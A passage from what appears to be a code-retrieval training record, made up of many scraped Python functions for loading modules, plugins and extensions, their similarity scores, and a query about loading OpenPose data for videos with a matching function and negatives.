module in all_modules:\n for member in module.members:\n if isinstance(member, docspec.Class):\n classes[member.name] = member\n\n # Load the modules specified in the search path\n modules = super().load()\n\n # Add inherited methods to the classes\n modules = self.include_inherited_methods(modules, classes)\n\n return modules", "def get_loaded_modules(self):\n return self._get_modules(self.loaded_modules)", "def _LoadPackages():\n return {module.__name__.split('.')[-1]: module for module in\n import_util.LoadModulesForPath(__path__, __name__)}", "def loadModules(path=None, ofType=None):\n \"\"\"returns a dictionary of loaded modules {name: type}\"\"\"\n import os\n import re\n import sys\n import inspect\n\n if path == None:\n path = os.path.dirname(__file__)\n\n path = os.path.realpath(path)\n modules = []\n\n find = re.compile(\".*\\.py$\", re.IGNORECASE)\n if os.path.isdir(path):\n toLoad = map(lambda f: os.path.splitext(f)[0], filter(find.search, os.listdir(path)))\n else:\n toLoad = [os.path.splitext(os.path.basename(path))[0]]\n sys.path.append(os.path.dirname(path))\n\n ret = {}\n logger = logging.getLogger(ActionManager.__name__)\n for moduleName in toLoad:\n try:\n module = __import__(moduleName, globals(), locals())\n for _, type_ in inspect.getmembers(module, inspect.isclass):\n if issubclass(type_, ofType) and not type_ == ofType:\n ret[type_.supportedClass] = type_\n logger.debug(\"Registering runner for type %s\" % type_.supportedClass)\n\n except Exception as e:\n logger.critical(\"Unable to import module %s, Exception: %s\" % (module, e))\n\n return ret", "def load_functions(self, module_name, path=None):\n# try:\n if True:\n if not path:\n path = os.getcwd()\n if not isinstance(path,list):\n path = [path]\n file,filename,desc = imp.find_module(module_name,path)\n funcs = imp.load_module(module_name, file, filename, desc)\n if hasattr(funcs,'_init'):\n getattr(funcs,'_init')(self)\n attrs = [attr for attr in funcs.__dict__ \n if not attr.startswith('__')\n and attr is not '_init'\n and not hasattr(getattr(funcs,attr),'__base__')]\n for attr in attrs:\n try:\n print 'Adding', attr, 'to', self._name\n self.add_function(getattr(funcs,attr))\n except:\n print 'Error adding', attr, 'to', self._name", "def reload(*mods):\n for mod in mods:\n importlib.reload(importlib.import_module(mod))", "def refresh(self):\n self.modules.clear()\n module_files = []\n module_paths = os.environ['MAYA_MODULE_PATH'].split(os.pathsep)\n for p in module_paths:\n try:\n module_files += [os.path.join(p, x).replace(os.sep, os.altsep or os.sep) for x in os.listdir(p) if\n x.lower()[-3:] == \"mod\"]\n except OSError:\n pass # ignore bad paths\n for eachfile in module_files:\n for eachmod in self.parse_mod(eachfile):\n self.modules[\"{0.name} ({0.version})\".format(eachmod)] = eachmod", "def mod_load(self):\n raise NotImplementedError(\"Mod load isn't overriden\")", "def get_all_modules(package):\n base = Path(inspect.getabsfile(package)).parent\n\n for fl in base.glob(\"*.py\"):\n print(f\"loading module {fl}\")\n yield load_module(fl)", "def load_sources(self):\n self.pymodule = imp.load_source(self.name, self.path)", "def load_conf_modules():\n for modname in _list_module_names():\n mod = importutils.import_module('monasca_api.conf.' + modname)\n required_funcs = ['register_opts', 'list_opts']\n for func in required_funcs:\n if hasattr(mod, func):\n yield mod", "def run_load(rootpath):\n global CSV_PATH\n CSV_PATH = rootpath+'/csv_files/'\n load_movies_details()\n load_movies_cast()\n load_movies_reviews()", "def import_all():\n import theory", "def loadPlugins():\n sys.path.append(basedefs.DIR_PLUGINS)\n fileList = sorted(os.listdir(basedefs.DIR_PLUGINS), cmp=plugin_compare)\n for item in fileList:\n # Looking for files that end with ###.py, example: a_plugin_100.py\n match = re.search(\"^(.+\\_\\d\\d\\d)\\.py$\", item)\n if match:\n try:\n moduleToLoad = match.group(1)\n logging.debug(\"importing module %s, from file %s\", moduleToLoad, item)\n moduleobj = __import__(moduleToLoad)\n moduleobj.__file__ = os.path.join(basedefs.DIR_PLUGINS, item)\n globals()[moduleToLoad] = moduleobj\n checkPlugin(moduleobj)\n controller.addPlugin(moduleobj)\n except:\n logging.error(\"Failed to load plugin from file %s\", item)\n logging.error(traceback.format_exc())\n raise Exception(\"Failed to load plugin from file %s\" % item)", "def dispatch_load(self):\n\n for node in self.nodes:\n threading.Thread(target=self.__start_load, args=(node,)).start()", "def import_all():\n import sys\n\n # obviously this is a hack for now... What's the right way to learn\n # the directory that holds the plugins directory? I don't want the\n # directory itself, because I *think* we might get name conflicts if we\n # import them directly. (I'm fuzzy about how that works. Can you\n # import \"x\" from one path and \"x\" from another path, and have them both\n # around with the same name? sys.modules suggests no.\n pdir = \"/home/sandro/riftr\"\n sys.path.append(pdir)\n \n dir = \"plugins\"\n ids = {}\n for filename in os.listdir(pdir + \"/\" + dir):\n if filename.endswith(\".py\") and not filename[0] == \"_\":\n local = filename[0:-3]\n module_name = dir + \".\" + local\n #print \n #print module_name\n m = __import__(module_name)\n mm = getattr(m, local)\n #print \"=> \", mm\n for (name, entry) in mm.__dict__.items():\n if getattr(entry, \"__doc__\", False) and getattr(entry, \"id\", False):\n if entry.id.startswith(dir+\".\"):\n # because they used \"__name__\"\n entry.id = entry.id[len(dir+\".\"):]\n if entry.id in ids:\n raise RuntimeError, (\"Duplicate id: %s used in %s and %s\" %\n entry.id, ids[entry.id], filename)\n ids[entry.id] = filename\n #print \"registering\", name, entry\n register(entry)\n \n # I wonder why issubclass doesn't work for me like this.\n #if type(entry).__name__ in [ \"classobj\", \"type\" ]:\n # print \"is type/class\", name, entry\n # print issubclass(entry, object)\n # print issubclass(entry, Plugin)\n # print issubclass(entry, InputPlugin)\n\n\n sys.path.pop(-1)", "def command_load(interface,command,args):\n try:\n modules.add_module(args)\n interface.reply(\"Loaded %s\"%args)\n except ImportError, e:\n interface.reply(str(e))\n except modules.ModuleAlreadyLoaded, e:\n interface.reply(str(e))", "def list_modules():\n for module_name in listdir(modules_directory):\n if isdir(join(modules_directory, module_name)):\n log.debug('Load module: {0}'.format(module_name))\n yield module_name", "def load_module(cls, *args, **kwargs): # real signature unknown\n pass", "def load_module(cls, *args, **kwargs): # real signature unknown\n pass", "def load_module(cls, *args, **kwargs): # real signature unknown\n pass", "def import_all_handlers(self):\n import os\n exclude_list=[\"base\"]\n\n #\n # the list of handlers (excluding base. Add more you dont want\n # to be loaded or inspected to exclude_list above.)\n #\n mods=[]\n module_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), 'handlers'))\n #print(\"importing handlers from: \" + module_path)\n for mod in os.listdir( module_path ):\n mod = mod.split(\".\")[0]\n if not mod.startswith(\"_\") and not mod in exclude_list:\n #print(\" now processing: \" + str(mod))\n mods.append(mod)\n \n #print(\"mods: \" + str(mods))\n class_list = []\n # load all the models from their modules (mods)\n #print(str(mods))\n import importlib\n for m in mods:\n #print(\"importing: \" + 'pow_comments.handlers.' + m) \n try:\n mod = importlib.import_module('pow_comments.handlers.' + m)\n except:\n pass\n #print(dir(mod))", "def load_sections():\n pass", "def load_plugins(self):\n self.__doing('load_plugins')\n self.__do_if_not_done('bootstrap')\n if self.env.mode in ('dummy', 'unit_test'):\n return\n for package in self.packages:\n self.add_package(package)", "def load_plugins():\n\timport imp\n\tglobal plugins\n\n\t# import plugins\n\ti = 1\n\tfor dirname, dirnames, filenames in os.walk(PLUGINS_PATH):\n\t\tfor filename in filenames:\n\t\t\tif filename.startswith(\"plugin-\") and filename.endswith(\".py\"):\n\t\t\t\t# print \"Loading plugin:\", filename\n\t\t\t\tload_path = os.path.join(dirname, filename)\n\t\t\t\tmodule = imp.load_source(\"plugin%s\" % i, load_path)\n\n\t# init each plugin\n\tplugins = LinksProvider.get_plugins()", "def _import_all_modules():\n import inspect\n import os\n\n all_objects = []\n globals_, locals_ = globals(), locals()\n\n # dynamically import all the package modules\n modules = set()\n json_files = set()\n for filename in os.listdir(os.path.dirname(__file__)):\n # process all python files in directory that don't start with underscore\n # (which also keeps this module from importing itself)\n modulename, ext = os.path.splitext(filename)\n if filename[0] != \"_\":\n if ext == \".py\":\n modules.add(modulename)\n elif ext == \".json\":\n json_files.add(filename)\n\n old_length = len(modules) + 1\n errors = {}\n while len(modules) and old_length > len(modules):\n old_length = len(modules)\n for modulename in modules.copy():\n package_module = \".\".join([__name__, modulename])\n try:\n module = __import__(package_module, globals_, locals_, [modulename])\n except ModuleNotFoundError as err:\n raise err\n except ImportError as err:\n errors[modulename] = repr(err)\n continue\n\n # Only the class with the same name as the file will be imported\n found_class = False\n for obj_name in filter(lambda name: name[0] != \"_\", module.__dict__):\n found_class = modulename.lower() == obj_name.lower()\n obj = module.__dict__[obj_name]\n if found_class and inspect.isclass(\n obj\n ): # Check that the object found is a class\n globals_[obj_name] = module.__dict__[obj_name]\n all_objects.append(obj_name)\n break\n\n if not found_class:\n logger.warning(\n \"File {}.py does not contain a class named {}. The file will be ignored.\"\n \"\".format(package_module, modulename)\n )\n\n modules.discard(modulename) # Remove module from the available list\n\n if modules:\n logger.warning(\"Failed to import from {} modules {}.\".format(__name__, modules))\n for modulename in modules:\n logger.debug(\"{}: {}\".format(modulename, errors[modulename]))\n\n from cosapp.systems import System\n from jsonschema import ValidationError\n\n def systemFactory(name: str, filename: str) -> System:\n obj = System.load(filename)\n obj.name = name\n return obj\n\n for json_file in json_files: # Fake class behavior for System JSON file\n try:\n tmp_system = System.load(json_file)\n except (TypeError, AttributeError, ValidationError):\n logger.warning(\n 'JSON file \"{}\" does not defined a CoSApp System.'.format(json_file)\n )\n else:\n obj_name = tmp_system.name.capitalize()\n globals_[obj_name] = lambda name: systemFactory(name, json_file)\n all_objects.append(obj_name)\n\n return all_objects", "async def reload_modules(self) -> bool:\n self.reloading_modules = True\n newmodules = await self.detect_modules()\n todrop = []\n toload = []\n\n # Logs!\n errors = False\n\n for name, module in self.modules.items():\n if module.loaded:\n if hasattr(module.module, \"unload\"):\n try:\n await module.module.unload(self.client.loop)\n except:\n LOGGER.exception(\n f\"Hit an exception while unloading module {name}.\")\n errors = True\n\n if name not in newmodules:\n LOGGER.debug(f\"Dropping removed module {name}.\")\n if hasattr(module.module, \"shutdown\"):\n try:\n await module.module.shutdown(self.client.loop)\n except:\n LOGGER.exception(\n f\"Hit an exception while shutting down module {name}.\")\n errors = True\n\n todrop.append(module)\n continue\n\n newmodules.remove(name)\n module.handlers = {}\n try:\n importlib.reload(module.module)\n\n except:\n LOGGER.exception(\n f\"Hit an exception while reloading module {name}.\")\n todrop.append(module)\n errors = True\n continue\n\n toload.append(module)\n module.loaded = True\n\n # Loops over NEW modules. Because we can't just reload them.\n for name in newmodules:\n newmod = MModule(name)\n self.modules[name] = newmod\n\n try:\n mod = importlib.import_module(name)\n except:\n LOGGER.exception(\n f\"Hit an exception while loading module {name}.\")\n # Alas it was not meant to be.\n del self.modules[name]\n errors = True\n continue\n\n newmod.module = mod\n toload.append(newmod)\n\n newmod.loaded = True\n for server in self.servers.values():\n server.modules[name] = newmod\n #LOGGER.info(f\"$BLUESuccessfully loaded module $WHITE{name}$BLUE.\")\n\n for module in toload:\n if hasattr(module.module, \"load\"):\n try:\n await module.module.load(self.client.loop)\n\n except:\n LOGGER.exception(\n f\"Hit an exception while load()ing module {module.name}.\")\n errors = True\n\n for module in todrop:\n for server in self.servers.values():\n if module.name in server.modules:\n del server.modules[module.name]\n\n del self.modules[module.name]\n\n self.reloading_modules = False\n\n for handler in self.temp_module_handlers:\n try:\n if handler.module in self.modules:\n self.register_handler(handler)\n\n else:\n LOGGER.warning(f\"Attempted to late-register for nonexistant module: {handler.module}/{handler.name}\")\n\n except:\n LOGGER.exception(\n f\"Exception while registering handler {handler.module}/{handler.name}!\")\n errors = True\n\n self.temp_module_handlers = []\n\n return errors", "def __load_cogs(self):\n for cog in self.__cogs.get():\n logging.info('loading %s', cog)\n self.load_extension(cog)", "def _load(self, directory):\n pass", "def load_tab(self, load_dir):\n conf = os.path.join(load_dir, 'conf', 'config_rec')\n self.load_tab_common(conf)", "def load_extensions(self):\n extension_module_name = f\"{utils.get_project_name()}.cogs\"\n for extension in CONF.LOADED_EXTENSIONS:\n try:\n self.load_extension(extension_module_name + \".\" + extension)\n LOG.debug(f\"The extension '{extension.split('.')[0]}' has been successfully loaded\")\n except Exception as e:\n message = f\"Failed to load extension '{extension.split('.')[0]}'\"\n LOG.exception(log.get_log_exception_message(message, e))", "def load_sub_modules(module):\n for loader, name, is_pkg in pkgutil.walk_packages(module.__path__):\n if '.' in name:\n continue\n\n import_module(f'{module.__name__}.{name}')", "def reload_all(from_load_path=True, keep_parameters=True):\n if keep_parameters:\n old_par=par[\"\"].as_dict(\"flat\")\n if from_load_path:\n cur_dir=os.path.abspath(os.curdir)\n os.chdir(_load_path)\n try:\n module_utils.reload_package_modules(__name__)\n finally:\n os.chdir(cur_dir)\n else:\n module_utils.reload_package_modules(__name__)\n par.refresh()\n if keep_parameters:\n for k,v in old_par.items():\n try:\n par[k]=v\n except KeyError:\n pass", "def load(self):\n self._really_load()", "def parse_modules(self) -> None:\n mods: Dict[str, str] = {}\n matches = self.find_dir(\"LoadModule\")\n iterator = iter(matches)\n # Make sure prev_size != cur_size for do: while: iteration\n prev_size = -1\n\n while len(mods) != prev_size:\n prev_size = len(mods)\n\n for match_name, match_filename in zip(\n iterator, iterator):\n mod_name = self.get_arg(match_name)\n mod_filename = self.get_arg(match_filename)\n if mod_name and mod_filename:\n mods[mod_name] = mod_filename\n mods[os.path.basename(mod_filename)[:-2] + \"c\"] = mod_filename\n else:\n logger.debug(\"Could not read LoadModule directive from Augeas path: %s\",\n match_name[6:])\n self.modules.update(mods)", "def force_load(self):\n pass", "def load_modules(self, filepaths):\n # removes filepaths from processed if they are not in sys.modules\n self._update_loaded_modules()\n filepaths = util.return_set(filepaths)\n\n modules = []\n for filepath in filepaths:\n filepath = self._clean_filepath(filepath)\n # check to see if already processed and move onto next if so\n if self._processed_filepath(filepath):\n continue\n\n module_name = util.get_module_name(filepath)\n plugin_module_name = util.create_unique_module_name(module_name)\n\n try:\n module = load_source(plugin_module_name, filepath)\n # Catch all exceptions b/c loader will return errors\n # within the code itself, such as Syntax, NameErrors, etc.\n except Exception:\n exc_info = sys.exc_info()\n self._log.error(msg=self._error_string.format(filepath),\n exc_info=exc_info)\n continue\n\n self.loaded_modules.add(module.__name__)\n modules.append(module)\n self.processed_filepaths[module.__name__] = filepath\n\n return modules", "def loaded_modules() -> List[str]:\n return PYSTAC_IO.keys()", "def load(path, reset=False):\n pass", "def load_app_modules(apps, submodules):\n for app in apps:\n mod = import_module(app)\n for submodule in submodules:\n import_submodule(mod, app, submodule)", "def load(name):\n return []", "def do_load(self, name):\n try:\n self.runner.run()\n\n except():\n print('Loading failed')", "def load(app: Flask):\n from . import user\n from . import game", "def loadInputFiles(self):\n\t\tfor filename in self.input_filename_list:\n\t\t\tfor module in self.modules:\n\t\t\t\tmodule.Add(filename)", "def _setup_modules(self):\r\n module_registry = AppModule.module_registry()\r\n for bundle in topological_sort(AppModule.module_dependencies()):\r\n for module_label in bundle:\r\n assert module_label in module_registry\r\n module = module_registry[module_label]\r\n self._debug_log('Initializing: %s (%s)' % (module.label(), module.description()))\r\n try:\r\n module.setup_function()\r\n except AppModule.Unimplemented:\r\n pass\r\n self._init_modules.append(module.label())", "def _load_objects():\n global DataArray, DataFrame, Series, Index, ndarray\n ndarray = np.ndarray\n DataArray = getattr(sys.modules.get('xarray', None), 'DataArray', ndarray)\n DataFrame = getattr(sys.modules.get('pandas', None), 'DataFrame', ndarray)\n Series = getattr(sys.modules.get('pandas', None), 'Series', ndarray)\n Index = getattr(sys.modules.get('pandas', None), 'Index', ndarray)", "def import_all():\n\n # count the number of files loaded\n count = 0\n\n # get model name\n model_name_list = [model for data_models in settings.OBJECT_DATA_MODELS\n for model in data_models]\n\n model_name_list += [model for model in settings.OTHER_DATA_MODELS]\n\n # import models one by one\n for model_name in model_name_list:\n import_model(model_name)\n\n # import localized strings\n import_localized_strings(settings.LANGUAGE_CODE)", "def run_loaded_modules(self, module_ignore_errors=False, verbosity=2):\n if len(self._loaded_modules) == 0:\n logger.info(\"No loaded task.\")\n return {}\n\n previous_frame = inspect.currentframe().f_back\n caller_info = inspect.getframeinfo(previous_frame)\n\n loaded_modules = copy.deepcopy(self._loaded_modules)\n self.clear_loaded_modules()\n self._log_modules(caller_info, self._loaded_modules, verbosity)\n\n tasks = [\n self.build_task(**module) for module in loaded_modules\n ]\n results = self.run_tasks(self.host_pattern, self.loader, self.im, self.vm, self.options, tasks=tasks)\n\n self._log_results(caller_info, loaded_modules, results, verbosity)\n self._check_results(caller_info, loaded_modules, results, module_ignore_errors, verbosity)\n\n return results", "def _get_modules(self, names):\n loaded_modules = []\n for name in names:\n loaded_modules.append(sys.modules[name])\n return loaded_modules", "def load_plugins(self) -> None:\n import importlib\n import pkgutil\n import stactools\n\n # From https://packaging.python.org/guides/creating-and-discovering-plugins/#using-namespace-packages # noqa\n def iter_namespace(ns_pkg: ModuleType) -> Iterator[ModuleInfo]:\n # Specifying the second argument (prefix) to iter_modules makes the\n # returned name an absolute name instead of a relative one. This allows\n # import_module to work without having to do additional modification to\n # the name.\n return pkgutil.iter_modules(\n ns_pkg.__path__, # type: ignore # mypy issue #1422\n ns_pkg.__name__ + '.')\n\n discovered_plugins = {\n name: importlib.import_module(name)\n for finder, name, ispkg in iter_namespace(stactools)\n }\n\n for name, module in discovered_plugins.items():\n register_plugin = getattr(module, 'register_plugin', None)\n if register_plugin:\n register_plugin(self)", "def load_cogs(self):\n\n path = \"cogs/\" # Should always have a trailing slash\n import_path = path.replace(\"/\", \".\")\n extensions: list[str] = [\n import_path + file.replace(\".py\", \"\")\n for file in os.listdir(path)\n if os.path.isfile(f\"{path}{file}\")\n ]\n\n for extension in extensions:\n try:\n self.load_extension(extension)\n except errors.ExtensionAlreadyLoaded:\n pass\n\n log.info(f\"Loaded {len(self.commands)} commands from {len(self.cogs)} cogs\")", "def load_kernel_modules():\n if not os.path.isdir(W1ThermSensor.BASE_DIRECTORY):\n os.system(\"modprobe w1-gpio >/dev/null 2>&1\")\n os.system(\"modprobe w1-therm >/dev/null 2>&1\")\n\n for _ in range(W1ThermSensor.RETRY_ATTEMPTS):\n if os.path.isdir(\n W1ThermSensor.BASE_DIRECTORY\n ): # w1 therm modules loaded correctly\n break\n time.sleep(W1ThermSensor.RETRY_DELAY_SECONDS)\n else:\n raise KernelModuleLoadError()", "async def reload_all(ctx):\n await ext_manager.reload_all()\n await ctx.send(\"Successfully reloaded.\")", "def load(self, start=False):\n self.load_networks(start=start)\n self.load_machines(start=start)", "def import_all_model_modules():\r\n import brokerage.model\r\n # ensure that these imports don't get auto-deleted! they have side effects.\r\n brokerage.model", "def __setup_modules(self, config, db, rcontext):\n DEPTH_ROOT = 0\n DEPTH_TYPE = 1\n DEPTH_SUBTYPE = 2\n\n for root, sub_folders, files in os.walk(\"modules\"):\n nicepath = os.path.relpath(root, \"modules\")\n fullpath = root\n\n if nicepath == '.':\n depth = DEPTH_ROOT\n else:\n depth = nicepath.count(os.path.sep) + 1\n\n if depth > DEPTH_SUBTYPE:\n warnings.warn(\"sub-subdirectory in module (%s) \\\n ignored.\" % nicepath)\n\n modulenamebase = nicepath.replace(os.path.sep, '.')\n mimetype = nicepath.replace(os.path.sep, '/')\n\n if depth != DEPTH_ROOT:\n # Each folder should except root have an __init__.py,\n # otherwise the directory name be assigned as a module.\n if not \"__init__.py\" in files:\n warnings.warn(\"__init__.py not found in \\\n module folder '%s'.\" % nicepath)\n continue\n\n modulepath = fullpath + os.path.sep + \"__init__.py\"\n module = Module(modulepath, modulenamebase, mimetype)\n self.modules.append(module)\n\n # Now load each handler .py file\n for file in files:\n modulenameend, extension = os.path.splitext(file)\n if extension.lower() == \".py\":\n is_init = file == \"__init__.py\"\n modulepath = fullpath + os.path.sep + file\n modulename = None\n if is_init:\n modulename = modulenamebase\n elif depth == DEPTH_ROOT:\n modulename = modulenameend\n else:\n modulename = modulenamebase + '.' + modulenameend\n\n module = Module(modulepath, modulename, mimetype,\n is_global=(depth == DEPTH_ROOT),\n as_mime_handler=not is_init)\n if module.is_mime_handler and not rcontext.is_recursive:\n db.setup_module_table(module.md5_tablename,\n module.columndefinition)\n\n self.modules.append(module)", "def load(bot, feature) :\n try :\n f = sys.modules[feature]\n\n except KeyError :\n f = False\n\n if f :\n imp.reload(f)\n initalize(bot, f)\n\n else :\n f = importlib.import_module(\"mandelbot.features.\" + feature)\n initalize(bot, f)\n sys.modules[feature] = f", "def load_all_plugins(self, paths, disabled=None):\n # Load plugins declared by setuptools entry points\n self.load_setuptools_entrypoints(hookspecs.hookspec.project_name)\n\n plugins = []\n for path in paths:\n plugin = load_module(path)\n if plugin:\n LOGGER.debug(\"Plugin found at '%s'\", path)\n plugins.append(plugin)\n\n plugins += [LightsPlugin(self), # Last called\n ViewPlugin(self),\n PrinterPlugin(self),\n PicturePlugin(self),\n CameraPlugin(self)] # First called\n\n for plugin in plugins:\n self.register(plugin, name=getattr(plugin, 'name', None))\n\n # Check that each hookimpl is defined in the hookspec\n # except for hookimpl with kwarg 'optionalhook=True'.\n self.check_pending()\n\n # Disable unwanted plugins\n if disabled:\n for name in disabled:\n self.unregister(name=name)", "def reload(self):\n self.rpc.call(MsfRpcMethod.CoreReloadModules)", "def load_all_packages():\n\n package_dict = dict((n, load_component_by_name(n))\n for n in list_packages())\n\n return package_dict", "def load(path):\n pass", "async def load_all_extensions(self, reload=False):\n succeeded = {}\n for extension in get_extensions():\n try:\n if reload or extension not in self.cogs_loaded:\n self.load_extension(f'cogs.{extension}')\n l.info(f\"Loaded extension '{extension}'\")\n self.cogs_loaded.add(extension)\n succeeded[extension] = True\n except Exception as e:\n error = f\"{extension}\\n {type(e).__name__} : {e}\"\n l.error(f\"Failed to load extension '{error}'\")\n succeeded[extension] = False\n if succeeded:\n l.info(LOG_SEP)\n return succeeded", "def unload_all():\n module_utils.unload_package_modules(__name__)", "def _update_loaded_modules(self):\n system_modules = sys.modules.keys()\n for module in list(self.loaded_modules):\n if module not in system_modules:\n self.processed_filepaths.pop(module)\n self.loaded_modules.remove(module)", "def reload():\n import cubegame\n importlib.reload(cubegame)\n exec(\"from cubegame import *\")", "def preload_modules(context: multiprocessing.context.BaseContext) -> None:\n all_loaded_modules = sys.modules.keys()\n preload = [\n loaded_module for loaded_module in all_loaded_modules\n if loaded_module.split('.')[0] in (\n 'smac',\n 'autoPyTorch',\n 'numpy',\n 'scipy',\n 'pandas',\n 'pynisher',\n 'sklearn',\n 'ConfigSpace',\n 'torch',\n 'torchvision',\n 'tensorboard',\n 'imgaug',\n 'catboost',\n 'lightgbm',\n ) and 'logging' not in loaded_module\n ]\n context.set_forkserver_preload(preload)", "def load(self):\n\n\t\tif self.module is None:\n\t\t\t# Cause the interpreter to load the module in local namespace ...\n\t\t\texec \"import \" + self.name\n\n\t\t\t# Store the module object ...\n\t\t\tobject.__setattr__(self, 'module', eval(self.name))", "def framework_load_weights(self):\n omit_modules = cfg.get('omit_modules_from_loading', [])\n\n for dest_module_path, path in self.get_load_paths():\n _print(\"Loading submodule \\\"{}\\\" from {}.\".format(dest_module_path, path))\n\n if \":\" in path:\n source_module_path, source_path = path.split(':')\n else:\n source_path = path\n source_module_path = dest_module_path\n\n start = time.time()\n\n device = get_pytorch_device()\n\n loaded_state_dict = torch.load(source_path, map_location=device)['model']\n\n if source_module_path:\n source_module_path_with_sep = source_module_path + '.'\n\n loaded_state_dict = type(loaded_state_dict)(\n {k: v for k, v in loaded_state_dict.items() if k.startswith(source_module_path_with_sep)}\n )\n\n assert loaded_state_dict, (\n f\"File contains no tensors with prefix `{source_module_path_with_sep}` (file: {source_path})\"\n )\n\n if dest_module_path != source_module_path:\n # Rename variables from the loaded state dict by replacing `source_module_path` with `dest_module_path`.\n\n _source_module_path = source_module_path + '.' if source_module_path else source_module_path\n _dest_module_path = dest_module_path + '.' if dest_module_path else dest_module_path\n\n loaded_state_dict = {\n k.replace(_source_module_path, _dest_module_path, 1): v\n for k, v in loaded_state_dict.items()\n }\n\n module = self.updater.model\n\n state_dict = module.state_dict()\n\n intersection = set(state_dict.keys()) & set(loaded_state_dict.keys())\n\n if not intersection:\n raise Exception(\n f\"Loading variables with spec ({dest_module_path}, {path}) \"\n f\"would have no effect (no variables found).\"\n )\n loaded_state_dict = {k: loaded_state_dict[k] for k in intersection}\n\n if omit_modules:\n omitted_variables = {\n k: v for k, v in loaded_state_dict.items()\n if any(k.startswith(o) for o in omit_modules)\n }\n\n print(\"Omitting the following variables from loading:\")\n describe_structure(omitted_variables)\n\n loaded_state_dict = {\n k: v for k, v in loaded_state_dict.items()\n if k not in omitted_variables\n }\n\n _print(\"Loading variables:\")\n describe_structure(loaded_state_dict)\n\n state_dict.update(loaded_state_dict)\n\n module.load_state_dict(state_dict, strict=True)\n\n _print(\"Done loading weights for module {}, took {} seconds.\".format(dest_module_path, time.time() - start))", "def load_all_files(self):\n\t\tself.get_rankings()\n\t\tself.get_partition()\n\t\tself.__load_factors()\n\t\tself.get_document_associations()\n\t\tself.get_term_associations()", "def collectPlugins(self):\n\t\tself.locatePlugins()\n\t\tself.loadPlugins()", "async def load_all_extensions(self):\n await self.wait_until_ready()\n await asyncio.sleep(1)\n\n cogs = [\"cogs.member\",\n \"cogs.officer\",\n \"cogs.rolemanager\",\n \"cogs.database\",\n \"cogs.everyone\",\n \"cogs.nodewar\",\n \"cogs.twitch\"]\n\n for extension in cogs:\n try:\n self.load_extension(extension)\n print(f'loaded {extension}')\n except Exception as e:\n error = f'{extension}\\n {type(e).__name__} : {e}'\n print(f'failed to load extension {error}')\n print('-' * 10)\n\n for guild in self.guilds:\n if not discord.utils.get(guild.roles, name=self.manager_role):\n await self.create_bot_manager(guild)\n\n print(f\"\\nUsername: {self.user}\\nID: {self.user.id}\")", "def load_variables(mod):\n for k in dir(mod):\n if '__' not in k:\n globals()[k] = getattr(mod, k)", "def on_modules_command(sender, command, label, args):\n plugin_header(sender, \"Modules\")\n msg(sender, \", \".join([((\"&a\" if mod in shared[\"modules\"] else \"&c\") + mod) for mod in shared[\"load_modules\"]]))", "def load(self):\n for name, item in itertools.chain(\n self._cal_objs.items(),\n self._noise_objs.items()):\n logger.debug(\"load {}\".format(item))\n item.load()", "def load(self, *args, **kw):\n if self._loaded:\n return\n args = args or self._loader[1]\n kw = kw or self._loader[2]\n loaded_models = self._loader[0](*args, **kw)\n for m in loaded_models:\n if isinstance(m, Model):\n self.add(m)\n else:\n self.add(self.model_class(**m))\n self._loaded = True", "def preload_all_configs(self):\n for _, _, filenames in os.walk(self.configDir):\n for filename in filenames:\n if filename[-3:] == \".py\" and filename != \"__init__.py\":\n configID = filename[0:-3]\n self.load_config(configID)" ]
[ "0.7162257", "0.677256", "0.6646025", "0.6645682", "0.6506407", "0.6479407", "0.6455077", "0.6443325", "0.6390843", "0.6241457", "0.623022", "0.62124735", "0.62108576", "0.62056154", "0.6129464", "0.61284095", "0.6105363", "0.60891134", "0.6054746", "0.60284793", "0.60165846", "0.5982475", "0.5981576", "0.59678525", "0.58912235", "0.5861728", "0.5852702", "0.58458567", "0.5823609", "0.581714", "0.5812449", "0.58078676", "0.580431", "0.57699317", "0.57577324", "0.5743973", "0.5736027", "0.5734533", "0.57317036", "0.57230103", "0.57168794", "0.57147264", "0.5713593", "0.5713593", "0.5713593", "0.5712001", "0.5680126", "0.5663111", "0.56576914", "0.56358504", "0.5635713", "0.5611403", "0.5599475", "0.5595817", "0.5595503", "0.55678505", "0.556357", "0.5552053", "0.5531546", "0.55075914", "0.550313", "0.5502088", "0.55005485", "0.5498815", "0.54967356", "0.54868984", "0.54863364", "0.5483802", "0.5483117", "0.54820436", "0.5471908", "0.54641914", "0.5460909", "0.54576623", "0.54531467", "0.54444873", "0.54401815", "0.54369813", "0.54343736", "0.5429556", "0.54245317", "0.54236597", "0.5412694", "0.5412209", "0.54115516", "0.5408448", "0.5406462", "0.54050976", "0.5402328", "0.5397826", "0.53957856", "0.5389717", "0.53886455", "0.53761876", "0.53745246", "0.5359319", "0.53324115", "0.53230286", "0.53222626", "0.53201234" ]
0.6359435
9
Loads openpose data for all videos.
def load_op_data_all(json_dirs, video_metadata_intel): frame_list_all_videos = [] for path_to_json, vm in zip(json_dirs, video_metadata_intel): frame_list_all_videos.append(load_op_data(path_to_json, vm)) return frame_list_all_videos
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_video_data(self):\n self.file_videos = [\n Video.from_file(path, self)\n for path in self.video_dir.glob('*.json')\n ]", "def loadData(catalog):\n loadVideos(catalog)", "def load_videos(self):\n logging.debug(\"Loading videos data...\")\n\n # loading videos\n data=requests.get(self.__URL_VIDEOS)\n self.__dataframe_videos=pd.DataFrame(data.json())\n # XXX transposing as the API returns a pre index list of videos\n self.__dataframe_videos = self.__dataframe_videos.transpose()\n if self.__save_raw_data_to_csv:\n logging.debug(\"Saving raw data to CSV [%s...\" % self.__RAW_DATA_FILENAME)\n self.__dataframe_videos.to_csv(self.__RAW_DATA_FILENAME, encoding='utf-8', sep=',', index=False)\n self.__dataframe_videos['video_contents'] = self.__dataframe_videos[['video_title', 'video_desc']].\\\n apply(lambda x: \" \".join(x), axis=1)\n\n logging.debug(\"Informative videos data loaded! n=%s\" % self.__dataframe_videos.shape[0])\n\n return self.__dataframe_videos", "def _loadData(self, data):\n Movie._loadData(self, data)\n PlexSession._loadData(self, data)", "def _loadData(self, data):\n Movie._loadData(self, data)\n PlexHistory._loadData(self, data)", "def _loadData(self, data):\n Episode._loadData(self, data)\n PlexSession._loadData(self, data)", "def load_pycon_data(pycon_videos=pycon_videos):\r\n with open(pycon_videos, 'rb') as fd:\r\n return pickle.load(fd)", "def load_pycon_data(pycon_videos: str):\n p_data = None\n with open(pycon_videos, 'rb') as pickle_file:\n p_data = pickle.load(pickle_file)\n return p_data", "def _load_data(self, cfg):\n # Load frame trajectories\n if 